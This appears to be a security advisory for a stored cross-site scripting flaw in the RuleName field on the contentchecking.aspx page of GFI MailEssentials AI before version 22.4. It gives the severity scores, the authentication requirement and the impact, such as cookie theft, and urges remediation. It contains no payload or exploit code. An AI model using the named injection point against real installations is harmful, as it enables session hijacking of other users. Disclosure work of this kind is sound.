The vulnerability is a stored cross‑site scripting flaw that allows an authenticated user to inject malicious HTML or JavaScript into the RuleName field of the Keyword Filtering rule creation workflow. The injected code is persisted on the server and later rendered in the management interface, enabling the attacker to execute arbitrary script in the browser context of any logged‑in user. This can be used to steal session cookies, hijack user actions, or perform further malicious activities within the scope granted to the authenticated account.

Products affected are GFI Software MailEssentials AI versions older than 22.4. The flaw resides in the contentchecking.aspx page of the MailSecurity component. All installations of MailEssentials AI before the 22.4 release are vulnerable, regardless of geographic location or deployment size.

The CVSS base score is 5.1, indicating a moderate level of severity. The exploitation probability is very low, with an EPSS score of less than 1%, and the flaw is not listed in the CISA KEV catalog. Attack requires authentication with privileges to create or edit keyword filtering rules. If exploited, the attacker gains the same rights as the logged‑in account but cannot escape the application boundary to compromise the underlying server or network. Nonetheless, organizations should prioritize remediation because the flaw permits arbitrary script execution inside a trusted browser session.